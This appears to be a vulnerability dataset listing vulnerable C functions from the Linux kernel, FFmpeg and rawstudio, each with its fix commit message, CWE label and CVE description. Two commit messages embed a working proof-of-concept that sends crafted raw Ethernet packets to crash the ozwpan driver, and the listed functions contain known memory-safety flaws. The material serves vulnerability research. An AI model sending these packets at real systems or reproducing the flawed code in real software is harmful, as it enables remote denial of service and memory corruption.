.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp) - 2
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(0),
.total_size = htole16(0),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt)
{
struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1);
struct oz_usb_ctx *usb_ctx;
spin_lock_bh(&pd->app_lock[OZ_APPID_USB]);
usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB];
if (usb_ctx)
oz_usb_get(usb_ctx);
spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]);
if (usb_ctx == NULL)
return; /* Context has gone so nothing to do. */
if (usb_ctx->stopped)
goto done;
/* If sequence number is non-zero then check it is not a duplicate.
* Zero sequence numbers are always accepted.
*/
if (usb_hdr->elt_seq_num != 0) {
if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0)
/* Reject duplicate element. */
goto done;
}
usb_ctx->rx_seq_num = usb_hdr->elt_seq_num;
switch (usb_hdr->type) {
case OZ_GET_DESC_RSP: {
struct oz_get_desc_rsp *body =
(struct oz_get_desc_rsp *)usb_hdr;
int data_len = elt->length -
sizeof(struct oz_get_desc_rsp) + 1;
u16 offs = le16_to_cpu(get_unaligned(&body->offset));
u16 total_size =
le16_to_cpu(get_unaligned(&body->total_size));
oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n");
oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id,
body->rcode, body->data,
data_len, offs, total_size);
}
break;
case OZ_SET_CONFIG_RSP: {
struct oz_set_config_rsp *body =
(struct oz_set_config_rsp *)usb_hdr;
oz_hcd_control_cnf(usb_ctx->hport, body->req_id,
body->rcode, NULL, 0);
}
break;
case OZ_SET_INTERFACE_RSP: {
struct oz_set_interface_rsp *body =
(struct oz_set_interface_rsp *)usb_hdr;
oz_hcd_control_cnf(usb_ctx->hport,
body->req_id, body->rcode, NULL, 0);
}
break;
case OZ_VENDOR_CLASS_RSP: {
struct oz_vendor_class_rsp *body =
(struct oz_vendor_class_rsp *)usb_hdr;
oz_hcd_control_cnf(usb_ctx->hport, body->req_id,
body->rcode, body->data, elt->length-
sizeof(struct oz_vendor_class_rsp)+1);
}
break;
case OZ_USB_ENDPOINT_DATA:
oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length);
break;
}
done:
oz_usb_put(usb_ctx);
}
| 205,444,369,337,433,030,000,000,000,000,000,000,000 | ozusbsvc1.c | 49,251,549,535,178,640,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-4002 | drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux kernel through 4.0.5 does not ensure that certain length values are sufficiently large, which allows remote attackers to cause a denial of service (system crash or large loop) or possibly execute arbitrary code via a crafted packet, related to the (1) oz_usb_rx and (2) oz_usb_handle_ep_data functions. | https://nvd.nist.gov/vuln/detail/CVE-2015-4002 |
1,474 | linux | b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c | ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
int length, int offset, int total_size)
{
struct oz_port *port = hport;
struct urb *urb;
int err = 0;
oz_dbg(ON, "oz_hcd_get_desc_cnf length = %d offs = %d tot_size = %d\n",
length, offset, total_size);
urb = oz_find_urb_by_id(port, 0, req_id);
if (!urb)
return;
if (status == 0) {
int copy_len;
int required_size = urb->transfer_buffer_length;
if (required_size > total_size)
required_size = total_size;
copy_len = required_size-offset;
if (length <= copy_len)
copy_len = length;
memcpy(urb->transfer_buffer+offset, desc, copy_len);
offset += copy_len;
if (offset < required_size) {
struct usb_ctrlrequest *setup =
(struct usb_ctrlrequest *)urb->setup_packet;
unsigned wvalue = le16_to_cpu(setup->wValue);
if (oz_enqueue_ep_urb(port, 0, 0, urb, req_id))
err = -ENOMEM;
else if (oz_usb_get_desc_req(port->hpd, req_id,
setup->bRequestType, (u8)(wvalue>>8),
(u8)wvalue, setup->wIndex, offset,
required_size-offset)) {
oz_dequeue_ep_urb(port, 0, 0, urb);
err = -ENOMEM;
}
if (err == 0)
return;
}
}
urb->actual_length = total_size;
oz_complete_urb(port->ozhcd->hcd, urb, 0);
}
| 320,708,195,163,871,100,000,000,000,000,000,000,000 | ozhcd.c | 306,747,271,140,156,940,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-4001 | Integer signedness error in the oz_hcd_get_desc_cnf function in drivers/staging/ozwpan/ozhcd.c in the OZWPAN driver in the Linux kernel through 4.0.5 allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted packet. | https://nvd.nist.gov/vuln/detail/CVE-2015-4001 |
1,477 | rawstudio | 983bda1f0fa5fa86884381208274198a620f006e | https://github.com/rawstudio/rawstudio | https://github.com/rawstudio/rawstudio/commit/983bda1f0fa5fa86884381208274198a620f006e | Avoid overflow in ljpeg_start(). | 1 | int CLASS ljpeg_start (struct jhead *jh, int info_only)
{
int c, tag, len;
uchar data[0x10000];
const uchar *dp;
memset (jh, 0, sizeof *jh);
jh->restart = INT_MAX;
fread (data, 2, 1, ifp);
if (data[1] != 0xd8) return 0;
do {
fread (data, 2, 2, ifp);
tag = data[0] << 8 | data[1];
len = (data[2] << 8 | data[3]) - 2;
if (tag <= 0xff00) return 0;
fread (data, 1, len, ifp);
switch (tag) {
case 0xffc3:
jh->sraw = ((data[7] >> 4) * (data[7] & 15) - 1) & 3;
case 0xffc0:
jh->bits = data[0];
jh->high = data[1] << 8 | data[2];
jh->wide = data[3] << 8 | data[4];
jh->clrs = data[5] + jh->sraw;
if (len == 9 && !dng_version) getc(ifp);
break;
case 0xffc4:
if (info_only) break;
for (dp = data; dp < data+len && (c = *dp++) < 4; )
jh->free[c] = jh->huff[c] = make_decoder_ref (&dp);
break;
case 0xffda:
jh->psv = data[1+data[0]*2];
jh->bits -= data[3+data[0]*2] & 15;
break;
case 0xffdd:
jh->restart = data[0] << 8 | data[1];
}
} while (tag != 0xffda);
if (info_only) return 1;
FORC(5) if (!jh->huff[c+1]) jh->huff[c+1] = jh->huff[c];
if (jh->sraw) {
FORC(4) jh->huff[2+c] = jh->huff[1];
FORC(jh->sraw) jh->huff[1+c] = jh->huff[0];
}
jh->row = (ushort *) calloc (jh->wide*jh->clrs, 4);
merror (jh->row, "ljpeg_start()");
return zero_after_ff = 1;
}
| 291,937,476,956,930,900,000,000,000,000,000,000,000 | dcraw.cc | 297,550,824,630,771,470,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-3885 | Integer overflow in the ljpeg_start function in dcraw 7.00 and earlier allows remote attackers to cause a denial of service (crash) via a crafted image, which triggers a buffer overflow, related to the len variable. | https://nvd.nist.gov/vuln/detail/CVE-2015-3885 |
1,478 | linux | a134f083e79fb4c3d0a925691e732c56911b4326 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/a134f083e79fb4c3d0a925691e732c56911b4326 | ipv4: Missing sk_nulls_node_init() in ping_unhash().
If we don't do that, then the poison value is left in the ->pprev
backlink.
This can cause crashes if we do a disconnect, followed by a connect().
Tested-by: Linus Torvalds <torvalds@linux-foundation.org>
Reported-by: Wen Xu <hotdog3645@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | void ping_unhash(struct sock *sk)
{
struct inet_sock *isk = inet_sk(sk);
pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
if (sk_hashed(sk)) {
write_lock_bh(&ping_table.lock);
hlist_nulls_del(&sk->sk_nulls_node);
sock_put(sk);
isk->inet_num = 0;
isk->inet_sport = 0;
sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
write_unlock_bh(&ping_table.lock);
}
}
| 310,891,391,724,566,200,000,000,000,000,000,000,000 | ping.c | 208,150,909,002,443,060,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-3636 | The ping_unhash function in net/ipv4/ping.c in the Linux kernel before 4.0.3 does not initialize a certain list data structure during an unhash operation, which allows local users to gain privileges or cause a denial of service (use-after-free and system crash) by leveraging the ability to make a SOCK_DGRAM socket system call for the IPPROTO_ICMP or IPPROTO_ICMPV6 protocol, and then making a connect system call after a disconnect. | https://nvd.nist.gov/vuln/detail/CVE-2015-3636 |
1,479 | FFmpeg | e8714f6f93d1a32f4e4655209960afcf4c185214 | https://github.com/FFmpeg/FFmpeg | https://github.com/FFmpeg/FFmpeg/commit/e8714f6f93d1a32f4e4655209960afcf4c185214 | avcodec/h264: Clear delayed_pic on deallocation
Fixes use of freed memory
Fixes: case5_av_frame_copy_props.mp4
Found-by: Michal Zalewski <lcamtuf@coredump.cx>
Signed-off-by: Michael Niedermayer <michaelni@gmx.at> | 1 | void ff_h264_free_tables(H264Context *h, int free_rbsp)
{
int i;
H264Context *hx;
av_freep(&h->intra4x4_pred_mode);
av_freep(&h->chroma_pred_mode_table);
av_freep(&h->cbp_table);
av_freep(&h->mvd_table[0]);
av_freep(&h->mvd_table[1]);
av_freep(&h->direct_table);
av_freep(&h->non_zero_count);
av_freep(&h->slice_table_base);
h->slice_table = NULL;
av_freep(&h->list_counts);
av_freep(&h->mb2b_xy);
av_freep(&h->mb2br_xy);
av_buffer_pool_uninit(&h->qscale_table_pool);
av_buffer_pool_uninit(&h->mb_type_pool);
av_buffer_pool_uninit(&h->motion_val_pool);
av_buffer_pool_uninit(&h->ref_index_pool);
if (free_rbsp && h->DPB) {
for (i = 0; i < H264_MAX_PICTURE_COUNT; i++)
ff_h264_unref_picture(h, &h->DPB[i]);
av_freep(&h->DPB);
} else if (h->DPB) {
for (i = 0; i < H264_MAX_PICTURE_COUNT; i++)
h->DPB[i].needs_realloc = 1;
}
h->cur_pic_ptr = NULL;
for (i = 0; i < H264_MAX_THREADS; i++) {
hx = h->thread_context[i];
if (!hx)
continue;
av_freep(&hx->top_borders[1]);
av_freep(&hx->top_borders[0]);
av_freep(&hx->bipred_scratchpad);
av_freep(&hx->edge_emu_buffer);
av_freep(&hx->dc_val_base);
av_freep(&hx->er.mb_index2xy);
av_freep(&hx->er.error_status_table);
av_freep(&hx->er.er_temp_buffer);
av_freep(&hx->er.mbintra_table);
av_freep(&hx->er.mbskip_table);
if (free_rbsp) {
av_freep(&hx->rbsp_buffer[1]);
av_freep(&hx->rbsp_buffer[0]);
hx->rbsp_buffer_size[0] = 0;
hx->rbsp_buffer_size[1] = 0;
}
if (i)
av_freep(&h->thread_context[i]);
}
}
| 160,444,303,816,193,310,000,000,000,000,000,000,000 | h264.c | 130,045,572,076,372,200,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-3417 | Use-after-free vulnerability in the ff_h264_free_tables function in libavcodec/h264.c in FFmpeg before 2.3.6 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted H.264 data in an MP4 file, as demonstrated by an HTML VIDEO element that references H.264 data. | https://nvd.nist.gov/vuln/detail/CVE-2015-3417 |
1,480 | linux | 8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 | fs: take i_mutex during prepare_binprm for set[ug]id executables
This prevents a race between chown() and execve(), where chowning a
setuid-user binary to root would momentarily make the binary setuid
root.
This patch was mostly written by Linus Torvalds.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | int prepare_binprm(struct linux_binprm *bprm)
{
struct inode *inode = file_inode(bprm->file);
umode_t mode = inode->i_mode;
int retval;
/* clear any previous set[ug]id data from a previous binary */
bprm->cred->euid = current_euid();
bprm->cred->egid = current_egid();
if (!(bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID) &&
!task_no_new_privs(current) &&
kuid_has_mapping(bprm->cred->user_ns, inode->i_uid) &&
kgid_has_mapping(bprm->cred->user_ns, inode->i_gid)) {
/* Set-uid? */
if (mode & S_ISUID) {
bprm->per_clear |= PER_CLEAR_ON_SETID;
bprm->cred->euid = inode->i_uid;
}
/* Set-gid? */
/*
* If setgid is set but no group execute bit then this
* is a candidate for mandatory locking, not a setgid
* executable.
*/
if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
bprm->per_clear |= PER_CLEAR_ON_SETID;
bprm->cred->egid = inode->i_gid;
}
}
/* fill in binprm security blob */
retval = security_bprm_set_creds(bprm);
if (retval)
return retval;
bprm->cred_prepared = 1;
memset(bprm->buf, 0, BINPRM_BUF_SIZE);
return kernel_read(bprm->file, 0, bprm->buf, BINPRM_BUF_SIZE);
}
| 335,498,349,453,083,000,000,000,000,000,000,000,000 | exec.c | 9,385,387,174,828,543,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-3339 | Race condition in the prepare_binprm function in fs/exec.c in the Linux kernel before 3.19.6 allows local users to gain privileges by executing a setuid program at a time instant when a chown to root is in progress, and the ownership is changed but the setuid bit is not yet stripped. | https://nvd.nist.gov/vuln/detail/CVE-2015-3339 |
1,481 | linux | ccfe8c3f7e52ae83155cb038753f4c75b774ca8a | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/ccfe8c3f7e52ae83155cb038753f4c75b774ca8a | crypto: aesni - fix memory usage in GCM decryption
The kernel crypto API logic requires the caller to provide the
length of (ciphertext || authentication tag) as cryptlen for the
AEAD decryption operation. Thus, the cipher implementation must
calculate the size of the plaintext output itself and cannot simply use
cryptlen.
The RFC4106 GCM decryption operation tries to overwrite cryptlen memory
in req->dst. As the destination buffer for decryption only needs to hold
the plaintext memory but cryptlen references the input buffer holding
(ciphertext || authentication tag), the assumption of the destination
buffer length in RFC4106 GCM operation leads to a too large size. This
patch simply uses the already calculated plaintext size.
In addition, this patch fixes the offset calculation of the AAD buffer
pointer: as mentioned before, cryptlen already includes the size of the
tag. Thus, the tag does not need to be added. With the addition, the AAD
will be written beyond the already allocated buffer.
Note, this fixes a kernel crash that can be triggered from user space
via AF_ALG(aead) -- simply use the libkcapi test application
from [1] and update it to use rfc4106-gcm-aes.
Using [1], the changes were tested using CAVS vectors to demonstrate
that the crypto operation still delivers the right results.
[1] http://www.chronox.de/libkcapi.html
CC: Tadeusz Struk <tadeusz.struk@intel.com>
Cc: stable@vger.kernel.org
Signed-off-by: Stephan Mueller <smueller@chronox.de>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au> | 1 | static int __driver_rfc4106_decrypt(struct aead_request *req)
{
u8 one_entry_in_sg = 0;
u8 *src, *dst, *assoc;
unsigned long tempCipherLen = 0;
__be32 counter = cpu_to_be32(1);
int retval = 0;
struct crypto_aead *tfm = crypto_aead_reqtfm(req);
struct aesni_rfc4106_gcm_ctx *ctx = aesni_rfc4106_gcm_ctx_get(tfm);
u32 key_len = ctx->aes_key_expanded.key_length;
void *aes_ctx = &(ctx->aes_key_expanded);
unsigned long auth_tag_len = crypto_aead_authsize(tfm);
u8 iv_and_authTag[32+AESNI_ALIGN];
u8 *iv = (u8 *) PTR_ALIGN((u8 *)iv_and_authTag, AESNI_ALIGN);
u8 *authTag = iv + 16;
struct scatter_walk src_sg_walk;
struct scatter_walk assoc_sg_walk;
struct scatter_walk dst_sg_walk;
unsigned int i;
if (unlikely((req->cryptlen < auth_tag_len) ||
(req->assoclen != 8 && req->assoclen != 12)))
return -EINVAL;
if (unlikely(auth_tag_len != 8 && auth_tag_len != 12 && auth_tag_len != 16))
return -EINVAL;
if (unlikely(key_len != AES_KEYSIZE_128 &&
key_len != AES_KEYSIZE_192 &&
key_len != AES_KEYSIZE_256))
return -EINVAL;
/* Assuming we are supporting rfc4106 64-bit extended */
/* sequence numbers We need to have the AAD length */
/* equal to 8 or 12 bytes */
tempCipherLen = (unsigned long)(req->cryptlen - auth_tag_len);
/* IV below built */
for (i = 0; i < 4; i++)
*(iv+i) = ctx->nonce[i];
for (i = 0; i < 8; i++)
*(iv+4+i) = req->iv[i];
*((__be32 *)(iv+12)) = counter;
if ((sg_is_last(req->src)) && (sg_is_last(req->assoc))) {
one_entry_in_sg = 1;
scatterwalk_start(&src_sg_walk, req->src);
scatterwalk_start(&assoc_sg_walk, req->assoc);
src = scatterwalk_map(&src_sg_walk);
assoc = scatterwalk_map(&assoc_sg_walk);
dst = src;
if (unlikely(req->src != req->dst)) {
scatterwalk_start(&dst_sg_walk, req->dst);
dst = scatterwalk_map(&dst_sg_walk);
}
} else {
/* Allocate memory for src, dst, assoc */
src = kmalloc(req->cryptlen + req->assoclen, GFP_ATOMIC);
if (!src)
return -ENOMEM;
assoc = (src + req->cryptlen + auth_tag_len);
scatterwalk_map_and_copy(src, req->src, 0, req->cryptlen, 0);
scatterwalk_map_and_copy(assoc, req->assoc, 0,
req->assoclen, 0);
dst = src;
}
aesni_gcm_dec_tfm(aes_ctx, dst, src, tempCipherLen, iv,
ctx->hash_subkey, assoc, (unsigned long)req->assoclen,
authTag, auth_tag_len);
/* Compare generated tag with passed in tag. */
retval = crypto_memneq(src + tempCipherLen, authTag, auth_tag_len) ?
-EBADMSG : 0;
if (one_entry_in_sg) {
if (unlikely(req->src != req->dst)) {
scatterwalk_unmap(dst);
scatterwalk_done(&dst_sg_walk, 0, 0);
}
scatterwalk_unmap(src);
scatterwalk_unmap(assoc);
scatterwalk_done(&src_sg_walk, 0, 0);
scatterwalk_done(&assoc_sg_walk, 0, 0);
} else {
scatterwalk_map_and_copy(dst, req->dst, 0, req->cryptlen, 1);
kfree(src);
}
return retval;
}
| 235,636,219,205,578,550,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2015-3331 | The __driver_rfc4106_decrypt function in arch/x86/crypto/aesni-intel_glue.c in the Linux kernel before 3.19.3 does not properly determine the memory locations used for encrypted data, which allows context-dependent attackers to cause a denial of service (buffer overflow and system crash) or possibly execute arbitrary code by triggering a crypto API call, as demonstrated by use of a libkcapi test program with an AF_ALG(aead) socket. | https://nvd.nist.gov/vuln/detail/CVE-2015-3331 |
1,488 | linux | 6fd99094de2b83d1d4c8457f2c83483b2828e75a | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/6fd99094de2b83d1d4c8457f2c83483b2828e75a | ipv6: Don't reduce hop limit for an interface
A local route may have a lower hop_limit set than global routes do.
RFC 3756, Section 4.2.7, "Parameter Spoofing"
> 1. The attacker includes a Current Hop Limit of one or another small
> number which the attacker knows will cause legitimate packets to
> be dropped before they reach their destination.
> As an example, one possible approach to mitigate this threat is to
> ignore very small hop limits. The nodes could implement a
> configurable minimum hop limit, and ignore attempts to set it below
> said limit.
Signed-off-by: D.S. Ljungmark <ljungmark@modio.se>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static void ndisc_router_discovery(struct sk_buff *skb)
{
struct ra_msg *ra_msg = (struct ra_msg *)skb_transport_header(skb);
struct neighbour *neigh = NULL;
struct inet6_dev *in6_dev;
struct rt6_info *rt = NULL;
int lifetime;
struct ndisc_options ndopts;
int optlen;
unsigned int pref = 0;
__u8 *opt = (__u8 *)(ra_msg + 1);
optlen = (skb_tail_pointer(skb) - skb_transport_header(skb)) -
sizeof(struct ra_msg);
ND_PRINTK(2, info,
"RA: %s, dev: %s\n",
__func__, skb->dev->name);
if (!(ipv6_addr_type(&ipv6_hdr(skb)->saddr) & IPV6_ADDR_LINKLOCAL)) {
ND_PRINTK(2, warn, "RA: source address is not link-local\n");
return;
}
if (optlen < 0) {
ND_PRINTK(2, warn, "RA: packet too short\n");
return;
}
#ifdef CONFIG_IPV6_NDISC_NODETYPE
if (skb->ndisc_nodetype == NDISC_NODETYPE_HOST) {
ND_PRINTK(2, warn, "RA: from host or unauthorized router\n");
return;
}
#endif
/*
* set the RA_RECV flag in the interface
*/
in6_dev = __in6_dev_get(skb->dev);
if (in6_dev == NULL) {
ND_PRINTK(0, err, "RA: can't find inet6 device for %s\n",
skb->dev->name);
return;
}
if (!ndisc_parse_options(opt, optlen, &ndopts)) {
ND_PRINTK(2, warn, "RA: invalid ND options\n");
return;
}
if (!ipv6_accept_ra(in6_dev)) {
ND_PRINTK(2, info,
"RA: %s, did not accept ra for dev: %s\n",
__func__, skb->dev->name);
goto skip_linkparms;
}
#ifdef CONFIG_IPV6_NDISC_NODETYPE
/* skip link-specific parameters from interior routers */
if (skb->ndisc_nodetype == NDISC_NODETYPE_NODEFAULT) {
ND_PRINTK(2, info,
"RA: %s, nodetype is NODEFAULT, dev: %s\n",
__func__, skb->dev->name);
goto skip_linkparms;
}
#endif
if (in6_dev->if_flags & IF_RS_SENT) {
/*
* flag that an RA was received after an RS was sent
* out on this interface.
*/
in6_dev->if_flags |= IF_RA_RCVD;
}
/*
* Remember the managed/otherconf flags from most recently
* received RA message (RFC 2462) -- yoshfuji
*/
in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED |
IF_RA_OTHERCONF)) |
(ra_msg->icmph.icmp6_addrconf_managed ?
IF_RA_MANAGED : 0) |
(ra_msg->icmph.icmp6_addrconf_other ?
IF_RA_OTHERCONF : 0);
if (!in6_dev->cnf.accept_ra_defrtr) {
ND_PRINTK(2, info,
"RA: %s, defrtr is false for dev: %s\n",
__func__, skb->dev->name);
goto skip_defrtr;
}
/* Do not accept RA with source-addr found on local machine unless
* accept_ra_from_local is set to true.
*/
if (!in6_dev->cnf.accept_ra_from_local &&
ipv6_chk_addr(dev_net(in6_dev->dev), &ipv6_hdr(skb)->saddr,
NULL, 0)) {
ND_PRINTK(2, info,
"RA from local address detected on dev: %s: default router ignored\n",
skb->dev->name);
goto skip_defrtr;
}
lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);
#ifdef CONFIG_IPV6_ROUTER_PREF
pref = ra_msg->icmph.icmp6_router_pref;
/* 10b is handled as if it were 00b (medium) */
if (pref == ICMPV6_ROUTER_PREF_INVALID ||
!in6_dev->cnf.accept_ra_rtr_pref)
pref = ICMPV6_ROUTER_PREF_MEDIUM;
#endif
rt = rt6_get_dflt_router(&ipv6_hdr(skb)->saddr, skb->dev);
if (rt) {
neigh = dst_neigh_lookup(&rt->dst, &ipv6_hdr(skb)->saddr);
if (!neigh) {
ND_PRINTK(0, err,
"RA: %s got default router without neighbour\n",
__func__);
ip6_rt_put(rt);
return;
}
}
if (rt && lifetime == 0) {
ip6_del_rt(rt);
rt = NULL;
}
ND_PRINTK(3, info, "RA: rt: %p lifetime: %d, for dev: %s\n",
rt, lifetime, skb->dev->name);
if (rt == NULL && lifetime) {
ND_PRINTK(3, info, "RA: adding default router\n");
rt = rt6_add_dflt_router(&ipv6_hdr(skb)->saddr, skb->dev, pref);
if (rt == NULL) {
ND_PRINTK(0, err,
"RA: %s failed to add default route\n",
__func__);
return;
}
neigh = dst_neigh_lookup(&rt->dst, &ipv6_hdr(skb)->saddr);
if (neigh == NULL) {
ND_PRINTK(0, err,
"RA: %s got default router without neighbour\n",
__func__);
ip6_rt_put(rt);
return;
}
neigh->flags |= NTF_ROUTER;
} else if (rt) {
rt->rt6i_flags = (rt->rt6i_flags & ~RTF_PREF_MASK) | RTF_PREF(pref);
}
if (rt)
